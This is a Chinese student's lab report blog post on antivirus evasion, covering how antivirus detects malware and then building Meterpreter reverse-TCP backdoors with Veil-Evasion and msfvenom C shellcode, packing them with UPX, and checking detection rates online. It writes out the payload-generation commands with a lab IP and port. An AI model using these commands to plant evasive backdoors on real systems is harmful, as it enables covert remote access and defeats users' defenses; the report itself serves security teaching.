Exp3 免杀原理与实践

一、基础问题回答

(1)杀软是如何检测出恶意代码的?

          -检测特征码


          -基于行为检测

 

          -启发式检测类似

(2)免杀是做什么?

使恶意软件不被AV检测出来

(3)免杀的基本方法有哪些?

     改变特征码。

     改变行为方式。

二.开始实验

1.原始的后门程序

将上此实验产生的后门文件直接拷贝到win主机下(我的杀毒软件是腾讯管家)

添加信任以后放在 http://www.virscan.org/上扫描,由于文件名不被允许,我改成了自己的名字,下图是结果。

2.veil-evasion版本

Veil-Evasion是一个与Metasploit有点类似的软件,已经在kali虚拟机里,如果没有可以进行在线安装:sudo apt-get install veil-evasion,我的kali虚拟机安装失败,求助了很多同学也没有解决的办法,只好用舍友的电脑来做。

在终端下输入指令veil-evasion即可打开软件,根据menu的提示依次键入以下指令:

use python/meterpreter/rev_tcp //设置payload
set LHOST 192.168.120.129 //设置反弹连接IP(kali的ip)
set port 4303 //设置反弹端口4318
generate //生成
4303 //程序名

该可执行文件存在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里,点击places的fengjia即可找到相应的文件夹:

同样的,我们放到该网站上扫描

3.C语言调用Shellcode版本

在Kali下生成一个C语言格式的shellcode数组,回连的IP为Kali的IP,端口自定。

输入代码msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=4303 -f c

在DEV C++中编译运行exe,在网站上扫描一下。尝试回连,并成功。

 

这个报毒率已经比较低了。

4.C调用升级版本加壳压缩壳UPX直接用upx将MSF直接生成的文件加壳。

在网站上扫描

居然是安全的文件!

接下来是我的电脑管家对三个文件的扫描结果

三.距离实战还有那些距离和技术?

我们如何稳定的监听目标主机的活动,就算是考虑周全的病毒也还是有被发现的可能,这是个问题。

四.实验感想

这次实验我很失落,因为我安装veil的过程中总是出现问题,我更换了源文件也没用,只好用舍友的电脑做。通过这次实验我清楚认识到了电脑被入侵是多么容易的一件事。这更加提高了保护自己电脑的警惕心,因为杀毒软件也不是绝对安全的。难以想象那些专业黑客入侵我们电脑是多么容易。

posted @ 2018-04-07 22:43  20154303张欣  阅读(85)  评论(0编辑  收藏